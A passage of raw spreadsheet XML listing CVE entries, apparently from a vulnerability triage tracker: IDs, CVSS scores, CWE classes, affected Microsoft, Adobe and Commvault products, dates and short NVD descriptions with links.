/><c r="M765" s="5" t="inlineStr" /><c r="N765" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O765" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P765" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q765" s="5" t="inlineStr" /><c r="R765" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S765" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t></is></c><c r="T765" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t></is></c></row><row r="766"><c r="A766" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B766" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C766" s="5" t="inlineStr"><is><t>CVE-2026-72932</t></is></c><c r="D766" s="5" t="n"><v>7.5</v></c><c r="E766" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F766" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G766" s="5" t="inlineStr" /><c r="H766" s="5" t="n"><v>0.01</v></c><c r="I766" s="5" t="inlineStr" /><c r="J766" s="5" t="inlineStr" /><c r="K766" s="5" t="inlineStr" /><c r="L766" s="5" t="inlineStr" /><c r="M766" s="5" t="inlineStr" /><c r="N766" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O766" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P766" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q766" s="5" t="inlineStr" /><c r="R766" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S766" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Message Queuing Queue Manager allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T766" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72932</t></is></c></row><row r="767"><c r="A767" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B767" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C767" s="5" t="inlineStr"><is><t>CVE-2026-72943</t></is></c><c r="D767" s="5" t="n"><v>7.5</v></c><c r="E767" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F767" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G767" s="5" t="inlineStr" /><c r="H767" s="5" t="n"><v>0.006</v></c><c r="I767" s="5" t="inlineStr" /><c r="J767" s="5" t="inlineStr" /><c r="K767" s="5" t="inlineStr" /><c r="L767" s="5" t="inlineStr" /><c r="M767" s="5" t="inlineStr" /><c r="N767" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O767" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P767" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q767" s="5" t="inlineStr" /><c r="R767" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S767" s="5" t="inlineStr"><is><t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T767" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72943</t></is></c></row><row r="768"><c r="A768" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B768" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C768" s="5" t="inlineStr"><is><t>CVE-2026-72949</t></is></c><c r="D768" s="5" t="n"><v>7.5</v></c><c r="E768" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F768" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G768" s="5" t="inlineStr" /><c r="H768" s="5" t="n"><v>0.011</v></c><c r="I768" s="5" t="inlineStr" /><c r="J768" s="5" t="inlineStr" /><c r="K768" s="5" t="inlineStr" /><c r="L768" s="5" t="inlineStr" /><c r="M768" s="5" t="inlineStr" /><c r="N768" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O768" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P768" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q768" s="5" t="inlineStr" /><c r="R768" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S768" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows SMB Server Network Transport Driver (srvnet.sys) allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T768" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72949</t></is></c></row><row r="769"><c r="A769" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B769" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C769" s="5" t="inlineStr"><is><t>CVE-2026-72954</t></is></c><c r="D769" s="5" t="n"><v>7.5</v></c><c r="E769" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F769" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G769" s="5" t="inlineStr" /><c r="H769" s="5" t="n"><v>0.006</v></c><c r="I769" s="5" t="inlineStr" /><c r="J769" s="5" t="inlineStr" /><c r="K769" s="5" t="inlineStr" /><c r="L769" s="5" t="inlineStr" /><c r="M769" s="5" t="inlineStr" /><c r="N769" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O769" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P769" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q769" s="5" t="inlineStr" /><c r="R769" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S769" s="5" t="inlineStr"><is><t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T769" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72954</t></is></c></row><row r="770"><c r="A770" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B770" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C770" s="5" t="inlineStr"><is><t>CVE-2026-72989</t></is></c><c r="D770" s="5" t="n"><v>7.5</v></c><c r="E770" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F770" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G770" s="5" t="inlineStr" /><c r="H770" s="5" t="n"><v>0.008</v></c><c r="I770" s="5" t="inlineStr" /><c r="J770" s="5" t="inlineStr" /><c r="K770" s="5" t="inlineStr" /><c r="L770" s="5" t="inlineStr" /><c r="M770" s="5" t="inlineStr" /><c r="N770" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O770" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P770" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q770" s="5" t="inlineStr" /><c r="R770" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S770" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Failover Cluster allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T770" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72989</t></is></c></row><row r="771"><c r="A771" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B771" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C771" s="5" t="inlineStr"><is><t>CVE-2026-73017</t></is></c><c r="D771" s="5" t="n"><v>7.5</v></c><c r="E771" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F771" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G771" s="5" t="inlineStr" /><c r="H771" s="5" t="n"><v>0.002</v></c><c r="I771" s="5" t="inlineStr" /><c r="J771" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K77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71" s="5" t="inlineStr" /><c r="M771" s="5" t="inlineStr" /><c r="N771" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O771" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P771" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q771" s="5" t="inlineStr" /><c r="R771" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S771" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t></is></c><c r="T771" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t></is></c></row><row r="772"><c r="A772" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B772" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C772" s="5" t="inlineStr"><is><t>CVE-2026-75998</t></is></c><c r="D772" s="5" t="n"><v>7.5</v></c><c r="E772" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F772" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G772" s="5" t="inlineStr" /><c r="H772" s="5" t="n"><v>0.006</v></c><c r="I772" s="5" t="inlineStr" /><c r="J772" s="5" t="inlineStr" /><c r="K772" s="5" t="inlineStr" /><c r="L772" s="5" t="inlineStr" /><c r="M772" s="5" t="inlineStr" /><c r="N772" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O772" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P772" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q772" s="5" t="inlineStr" /><c r="R772" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S772" s="5" t="inlineStr"><is><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is></c><c r="T772" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75998</t></is></c></row><row r="773"><c r="A773" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B773" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C773" s="5" t="inlineStr"><is><t>CVE-2026-77101</t></is></c><c r="D773" s="5" t="n"><v>7.5</v></c><c r="E773" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F773" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G773" s="5" t="inlineStr" /><c r="H773" s="5" t="n"><v>0.003</v></c><c r="I773" s="5" t="inlineStr" /><c r="J773" s="5" t="inlineStr" /><c r="K773" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L773" s="5" t="inlineStr" /><c r="M773" s="5" t="inlineStr" /><c r="N773" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O773" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P773" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q773" s="5" t="inlineStr" /><c r="R773" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S773" s="5" t="inlineStr"><is><t>CommServe contained a stack-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T773" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77101</t></is></c></row><row r="774"><c r="A774" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B774" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C774" s="5" t="inlineStr"><is><t>CVE-2026-77102</t></is></c><c r="D774" s="5" t="n"><v>7.5</v></c><c r="E774" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F774" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G774" s="5" t="inlineStr" /><c r="H774" s="5" t="n"><v>0.003</v></c><c r="I774" s="5" t="inlineStr" /><c r="J774" s="5" t="inlineStr" /><c r="K774" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L774" s="5" t="inlineStr" /><c r="M774" s="5" t="inlineStr" /><c r="N774" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O774" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P774" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q774" s="5" t="inlineStr" /><c r="R774" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S774" s="5" t="inlineStr"><is><t>CommServe contained a heap-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T774" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77102</t></is></c></row><row r="775"><c r="A775" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B775" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C775" s="5" t="inlineStr"><is><t>CVE-2026-77103</t></is></c><c r="D775" s="5" t="n"><v>7.5</v></c><c r="E775" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F775" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G775" s="5" t="inlineStr" /><c r="H775" s="5" t="n"><v>0.003</v></c><c r="I775" s="5" t="inlineStr" /><c r="J775" s="5" t="inlineStr" /><c r="K775" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L775" s="5" t="inlineStr" /><c r="M775" s="5" t="inlineStr" /><c r="N775" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O775" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P775" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q775" s="5" t="inlineStr" /><c r="R775" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S775" s="5" t="inlineStr"><is><t>CommServe contained an authentication bypass issue affecting access authorization and information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T775" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77103</t></is></c></row><row r="776"><c r="A776" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B776" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C776" s="5" t="inlineStr"><is><t>CVE-2026-77104</t></is></c><c r="D776" s="5" t="n"><v>7.5</v></c><c r="E776" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F776" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G776" s="5" t="inlineStr" /><c r="H776" s="5" t="n"><v>0.004</v></c><c r="I776" s="5" t="inlineStr" /><c r="J776" s="5" t="inlineStr" /><c r="K776" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L776" s="5" t="inlineStr" /><c r="M776" s="5" t="inlineStr" /><c r="N776" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O776" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P776" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q776" s="5" t="inlineStr" /><c r="R776" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S776" s="5" t="inlineStr"><is><t>CommServe contained a path traversal issue affecting information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T776" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77104</t></is></c></row><row r="777"><c r="A777" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B777" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C777" s="5" t="inlineStr"><is><t>CVE-2026-77108</t></is></c><c r="D777" s="5" t="n"><v>7.5</v></c><c r="E777" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F777" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G777" s="5" t="inlineStr" /><c r="H777" s="5" t="n"><v>0.005</v></c><c r="I777" s="5" t="inlineStr" /><c r="J777" s="5" t="inlineStr" /><c r="K777" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L777" s="5" t="inlineStr" /><c r="M777" s="5" t="inlineStr" /><c r="N777" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O777" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P777" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q777" s="5" t="inlineStr" /><c r="R777" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S777"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T777" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77108</t></is></c></row><row r="778"><c r="A778" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B778" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C778" s="5" t="inlineStr"><is><t>CVE-2026-77494</t></is></c><c r="D778" s="5" t="n"><v>7.5</v></c><c r="E778" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F778" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G778" s="5" t="inlineStr" /><c r="H778" s="5" t="n"><v>0.012</v></c><c r="I778" s="5" t="inlineStr" /><c r="J778" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K778" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L778" s="5" t="inlineStr" /><c r="M778" s="5" t="inlineStr" /><c r="N778" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O778" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P778" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q778" s="5" t="inlineStr" /><c r="R778" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S778" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T778" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t></is></c></row><row r="779"><c r="A779" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B779" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C779" s="5" t="inlineStr"><is><t>CVE-2026-77498</t></is></c><c r="D779" s="5" t="n"><v>7.5</v></c><c r="E779" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F779" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G779" s="5" t="inlineStr" /><c r="H779" s="5" t="n"><v>0.008</v></c><c r="I779" s="5" t="inlineStr" /><c r="J779" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K779" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L779" s="5" t="inlineStr" /><c r="M779" s="5" t="inlineStr" /><c r="N779" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O779" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P779" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q779" s="5" t="inlineStr" /><c r="R779" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S779" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T779" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t></is></c></row><row r="780"><c r="A780" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B780" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C780" s="5" t="inlineStr"><is><t>CVE-2026-77499</t></is></c><c r="D780" s="5" t="n"><v>7.5</v></c><c r="E780" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F780" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G780" s="5" t="inlineStr" /><c r="H780" s="5" t="n"><v>0.008999999999999999</v></c><c r="I780" s="5" t="inlineStr" /><c r="J780" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K780" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L780" s="5" t="inlineStr" /><c r="M780" s="5" t="inlineStr" /><c r="N780" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O780" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P780" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q780" s="5" t="inlineStr" /><c r="R780" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S780" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T780" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t></is></c></row><row r="781"><c r="A781" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B781" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C781" s="5" t="inlineStr"><is><t>CVE-2026-77501</t></is></c><c r="D781" s="5" t="n"><v>7.5</v></c><c r="E781" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F781" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G781" s="5" t="inlineStr" /><c r="H781" s="5" t="n"><v>0.008</v></c><c r="I781" s="5" t="inlineStr" /><c r="J781" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K781" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L781" s="5" t="inlineStr" /><c r="M781" s="5" t="inlineStr" /><c r="N781" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O781" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P781" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q781" s="5" t="inlineStr" /><c r="R781" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S781" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T781" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t></is></c></row><row r="782"><c r="A782" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B782" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C782" s="5" t="inlineStr"><is><t>CVE-2026-77502</t></is></c><c r="D782" s="5" t="n"><v>7.5</v></c><c r="E782" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F782" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G782" s="5" t="inlineStr" /><c r="H782" s="5" t="n"><v>0.008</v></c><c r="I782" s="5" t="inlineStr" /><c r="J782" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K782" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L782" s="5" t="inlineStr" /><c r="M782" s="5" t="inlineStr" /><c r="N782" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O782" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P782" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q782" s="5" t="inlineStr" /><c r="R782" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S782" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T782" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t></is></c></row><row r="783"><c r="A783" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B783" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C783" s="5" t="inlineStr"><is><t>CVE-2026-77886</t></is></c><c r="D783" s="5" t="n"><v>7.5</v></c><c r="E783" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F783" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G783" s="5" t="inlineStr" /><c r="H783" s="5" t="n"><v>0.008</v></c><c r="I783" s="5" t="inlineStr" /><c r="J783" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K783" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L783" s="5" t="inlineStr" /><c r="M783" s="5" t="inlineStr" /><c r="N783" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O783" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P783" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q783" s="5" t="inlineStr" /><c r="R783" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S783" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T783" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t></is></c></row><row r="784"><c r="A784" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B784" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C784" s="5" t="inlineStr"><is><t>CVE-2026-77888</t></is></c><c r="D784" s="5" t="n"><v>7.5</v></c><c r="E784" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F784" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G784" s="5" t="inlineStr" /><c r="H784" s="5" t="n"><v>0.008999999999999999</v></c><c r="I784" s="5" t="inlineStr" /><c r="J784" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K784" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L784" s="5" t="inlineStr" /><c r="M784" s="5" t="inlineStr" /><c r="N784" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O784" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P784" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q784" s="5" t="inlineStr" /><c r="R784" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S784" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T784" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t></is></c></row><row r="785"><c r="A785" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B785" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C785" s="5" t="inlineStr"><is><t>CVE-2026-77889</t></is></c><c r="D785" s="5" t="n"><v>7.5</v></c><c r="E785" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F785" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G785" s="5" t="inlineStr" /><c r="H785" s="5" t="n"><v>0.008999999999999999</v></c><c r="I785" s="5" t="inlineStr" /><c r="J785" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K785" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L785" s="5" t="inlineStr" /><c r="M785" s="5" t="inlineStr" /><c r="N785" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O785" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P785" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q785" s="5" t="inlineStr" /><c r="R785" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S785" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T785" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t></is></c></row><row r="786"><c r="A786" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B786" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C786" s="5" t="inlineStr"><is><t>CVE-2026-77890</t></is></c><c r="D786" s="5" t="n"><v>7.5</v></c><c r="E786" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F786" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G786" s="5" t="inlineStr" /><c r="H786" s="5" t="n"><v>0.008999999999999999</v></c><c r="I786" s="5" t="inlineStr" /><c r="J786" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K786" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L786" s="5" t="inlineStr" /><c r="M786" s="5" t="inlineStr" /><c r="N786" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O786" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P786" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q786" s="5" t="inlineStr" /><c r="R786" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S786" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows 